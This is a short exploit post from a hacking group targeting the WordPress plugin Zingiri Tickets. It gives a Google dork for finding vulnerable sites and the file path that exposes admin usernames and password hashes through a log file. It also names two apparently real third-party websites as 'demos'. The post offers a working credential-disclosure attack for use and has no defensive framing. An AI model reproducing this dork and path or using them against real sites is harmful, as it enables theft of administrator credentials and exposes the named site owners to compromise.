##########################################################################
# Title : WordPress Plugin Zingiri Tickets                               #
# Author: MadLeeTs                                                      #
# Greets: Shadow008,1337,Invectus,pSyCh0_3D,KhanTastiC,MadBuGz,H4x0rL1f3  #
# Vendor: http://www.zingiri.com/plugins-and-addons/tickets/             #
# Email : h4x0rl1f3@gmail.com WwW.MadLeeTs.CoM
<http://www.madleets.com/>
#
# Date : 17/04/2012                                                      #
# Dork : "/wp-content/plugins/zingiri-tickets"                           #
# Category  : PHP [Local File Disclosure]                                #
# Tested on: [Windows 7, Linux Ubuntu]                                   #
##########################################################################
Exploit
This vulnerbility affects very high because it shows you Admin username
and password hashes.
[localhost]/[path]/wp-content/plugins/zingiri-tickets/log.txt
Demo 1
http://www.hms69.com/wp-content/plugins/zingiri-tickets/log.txt
Demo 2
http://www.ranahost.com/wp-content/plugins/zingiri-tickets/log.txt
Regards to www.cyberarmy.com.pk & www.c0d3rz.com
##########################################################################